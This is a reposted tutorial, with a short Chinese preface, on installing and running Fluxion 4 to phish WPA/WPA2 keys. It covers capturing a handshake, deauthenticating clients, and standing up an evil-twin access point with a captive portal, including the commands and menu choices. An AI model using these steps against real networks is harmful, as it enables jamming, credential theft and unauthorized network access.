Fluxion 4 Usage Guide
聲明:本文非原創,爲避免別人隨意轉載,特意打上原創標籤。css
國內流傳的大多數關於fluxion的教程都是老版本的,版本4的我都沒找到過,因此特意從國外把這篇文章給搬過來了,若是有人須要能夠參考,本打算本身寫一篇的,可是因爲這個工具的核心是社工,因此在實戰過程當中我歷來就沒成功過,因此也就懶得寫。若是須要翻譯的,或者實踐過程當中遇到什麼問題,歡迎隨時騷擾。nginx
What is Fluxion for?
Fluxion is a security auditing and social-engineering research tool. It is a remake of linset by vk496 with (hopefully) less bugs and more functionality. The script attempts to retrieve the WPA/WPA2 key from a target access point by means of a social engineering (phishing) attack. It's compatible with the latest release of Kali (rolling). Fluxion's attacks' setup is mostly manual, but experimental auto-mode handles some of the attacks' setup parameters.git
The advantage of this approach is that it does not require a long-time brute-force on a powerful hardware. The downside is social engineering attacks work not every time.github
How it worksweb
Scan for a target wireless network.sql
Launch the Handshake Snooper attack.windows
Capture a handshake (necessary for password verification).安全
Launch Captive Portal attack.bash
Spawns a rogue (fake) AP, imitating the original access point.微信
Spawns a DNS server, redirecting all requests to the attacker's host
running the captive portal.Spawns a web server, serving the captive portal which prompts users
for their WPA/WPA2 key.Spawns a jammer, deauthenticating all clients from original AP and
luring them to the rogue AP.All authentication attempts at the captive portal are checked against
the handshake file captured earlier.The attack will automatically terminate once a correct key has been
submitted. The key will be logged and clients will be allowed to
reconnect to the target access point.
How to install Fluxion in Kali Linux
To install Fluxion in Kali Linux run the commands:
1git clone https://github.com/FluxionNetwork/fluxion
2cd fluxion/
3sudo ./fluxion.sh
Note that we did not manually install the dependencies of Fluxion, because the first time you run the program, it will check the missing dependencies and install them.
When downloading the program files, you can specify the --recursive flag and then the program will be downloaded, as well as additional skins for Captive Portals (those web pages that victims see on their devices during the attack):
1git clone https://github.com/FluxionNetwork/fluxion --recursive
About installation in Ubuntu and its derived distributions, see the article ‘How to install Fluxion in Linux Mint or Ubuntu’.
New Fluxion 4 manual
The program has an automatic mode, but it is rather experimental. The program has interactive text menu.
Stop Network Manager and processes that can interfere:
1sudo systemctl stop NetworkManager
2sudo airmon-ng check kill
Typical launch of the program, go to its folder:
1cd fluxion/
The program is updated very often, so to download the latest version, run the command:
1git pull
And we start:
1sudo ./fluxion.sh
Select language:
We need to grab a handshake. It will not be used for brut-force (there will not be brut-force at all). But it is necessary to check if the user entered the correct password. Therefore, we select item two:
1[2] Handshake Snopper Acquires WPA/WPA2 encryption hashes.
Select a wireless interface for target searching:
Select the channel where you want to search for targets:
Five seconds after the target AP appears, close the FLUXION Scanner (ctrl+c).
When you see the desired target, close the new window, the list of access points will be displayed in the main program window:
When entering the number of an access point, which we will attack, DO NOT enter leading zeros.
Select an interface for target tracking.
1Select a method of handshake retrieval
2
3 [1] Monitor (passive)
4 [2] aireplay-ng deauthentication (aggressive)
5 [3] mdk3 deauthentication (aggressive)
A passive method of attack forces the radio to go completely silent, making the attack subtle (undetectable), and allowing for better listening. This method should work best for situations where the target is far away. The downside is the fact the radio must keep listening until someone connects to the target access point, which could take a very long time.
An aggressive method of attack uses a deauthenticator, either aireplay-ng or mdk3, and sends deauthentication packets to the target access point's clients. This method is considered aggressive because it is essentially jamming the connection between the target access point and its clients, effectively cutting the connection between the two. Once the connection has been broken, some devices will automatically attempt to reconnect, sending a 4-way handshake which fluxion's radio could catch. This method could be considered illegal. Make sure to follow governing laws applying to you. We're not liable for your irresponsibility.
Select a method of verification for the hash. Here we select the program with which help it will be determined whether enough frames have already been captured to verify the password or not:
How often should the verifier check for a handshake?
1How should verification occur?
2
3 [1] Asynchronously (fast systems only).
4 [2] Synchronously (recommended).
This sets how verification occurs in relation to capturing data, either simultaneously (asynchronously), or back-to-back (synchronously).
The asynchronous option will run the verifier while the computer is still capturing data. This could cause an issue in slow systems, because pyrit … stripLive might be interrupted by the captor overwriting data too early. The probability of encountering that problem increases over time, since more data needs to be examined by pyrit … stripLive. I suggest avoiding this if possible, or to limit its use to places were the handshake file will be caught relatively quickly.
The synchronous option will halt data capturing before attempting to check for a handshake, to prevent the issues described before. The downside of this method is the fact it'll stop listening while checking for handshakes, meaning it could miss a handshake while checking for one.
Three additional windows will appear periodically. If a handshake is captured, i.e. the attack succeeded, then one of the windows will have such an entry, and the other windows will be closed and the attack stopped:
Now go to the Captive Portal attack.
Many of the wireless adapters used in penetration testing support the addition of a virtual wireless interface. This interface can be in monitor mode or in AP mode. Due to this possibility, when creating a fake access point and simultaneously jamming a real access point, you can use one single Wi-Fi card. And Fluxion knows how to do it.
But since the fourth version, Fluxion has added one more function - to follow the attacked access point. The problem is that some access points, when a deauthentication attack is conducted against them, change the channel on which they operate. As a result, they become immune to our attack, you have to stop Fluxion, re-select the target and launch the attack again. The essence of the new function is that Fluxion regularly checks which channel the access point is operating on, and if it changes the channel, Fluxion automatically restarts the attack on the correct channel.
So, if you want to use the pursuit function, then you need a second wireless card, which supports monitor mode. If you do not have one, you can skip using this function.
We launch the another attack:
1[1] Captive Portal Creates an "evil twin" access point.
Fluxion is targetting the access point above. Agree:
Select an interface for target tracking. This is the new function, about which I spoke just above. If you have two wireless interfaces, select the one you want to use with this feature. If the interface is one, then select ‘Skip’:
Now choose the interface for jamming (choose a different one than the one chosen for the pursuit, otherwise there will be problems):
Select an interface for the access point. If you do not have a separate wireless card to create an access point, then select the same interface that is selected for jamming (this is normal and if the wireless card supports adding a virtual interface, everything will work fine):
elect the program that will create the access point. The authors recommend avoiding airbase-ng if you use the same Wi-Fi card both for creating an access point and for deauthentication (jamming):
If you have already captured a handshake, a message will appear that it has been found. You can use it or specify a path to another:
Again select a method of verification for the hash:
Next, we select the source of the SSL certificate for the captive portal. Options:
1[1] Create an SSL certificate
2[2] Detect SSL certificate (search again)
3[3] None (disable SSL)
When prompted, select an SSL certificate source for the captive portal, or select to disable SSL.
SSL is a method of encryption used to establish a secure connection between two points. In this case, the two points are the captive portal’s web server, and the target client.
If you've got a personal certificate, you must save it at fluxion/attacks/Captive Portal/certificate/server.pem and the attack will automatically detect it and auto-select it.
If you don't have a personal certificate, you may select to automatically generate one. The downside is that the certificate, having been created by a random individual, will not be trusted by any device, which will likely trigger warnings for clients attempting a secure connection to the captive portal.
If you would rather not bother with SSL, you can choose to disable it. Once disabled, the captive portal’s web server will only accept unencrypted connections, which exposes the information clients send to fluxion. This can be particularly unsafe if someone’s spying on network traffic. This might also trigger warnings for some clients, since the browser will need to send forms over an unencrypted connection.
In my opinion, in nowadays realities it is better to use SSL, since majority of web sites using HTTPS, and more likely that a user selects using an unsafe protocol than wait for a chance that he will try to open a site using HTTP.
Select an internet connectivity type for the rogue network.
When prompted, select wheather the captive portal web server should attempt emulating an internet connection.
This option only affects iOS clients, and some Android clients.
This could be useful for people that don’t want to make the captive portal obvious. The clients will connect, but will be fooled into believing internet access is available. This will cause all iOS clients, and some Android clients to not show the captive portal immediately upon connecting to the rogue network, however, the captive portal will still show up once the clients try accessing any web site.
Warning: This could cause clients to hang while trying to load sites, including iOS clients. The issue occurs when this option is selected, and SSL is disabled. The cause is clients attempting to access an SSL capable site, such as google.com, but hanging while waiting for a connection from the captive portal’s web server. The hanging is caused by the clients believing there’s internet access, but no responses received for SSL enabled sites.
Select a captive portal interface for the rogue network. By default, Generic Portal are available, suitable for all cases in different languages:
Now the attack starts, many windows will open.
Clients will be disconnected, and they will not be able to connect to the true network during the entire duration of the attack. But for them there will be another network, it is without a password, to which you can connect with one tap:
If the client does this, then when he tries to open any site, he will be redirected to the Captive Portal:
All the data entered is transmitted to Fluxion, which checks in real-time whether the password is correct or not. If the password is not correct, then such a window is displayed, and the attack continues:
If the password is correct, then it is shown to the attacker, and the attack ceases immediately. After that, the client (victim) device will automatically connect to the original access point and he will receive his normal Internet connection.
Additional skins for Captive Portals
There are variants of the Portals simulating different models of routers in different languages, they are in this repository: https://github.com/FluxionNetwork/sites
When you are in the Fluxion folder, you can install them all with the command:
1git clone https://github.com/FluxionNetwork/sites ./attacks/Captive\ Portal/sites/
OR with this command:
1git submodule update --init --recursive
OR initially download Fluxion with the --recursive flag:
1git clone https://github.com/FluxionNetwork/fluxion --recursive
It is not necessary to download them all, you can download some manually, after that place them in the fluxion/attacks/Captive Portal/sites/ folder.
本文分享自微信公衆號 - 一個安全研究員(sec_tntaxin)。
若有侵權,請聯繫 support@oschina.cn 刪除。
本文參與「OSC源創計劃」,歡迎正在閱讀的你也加入,一塊兒分享。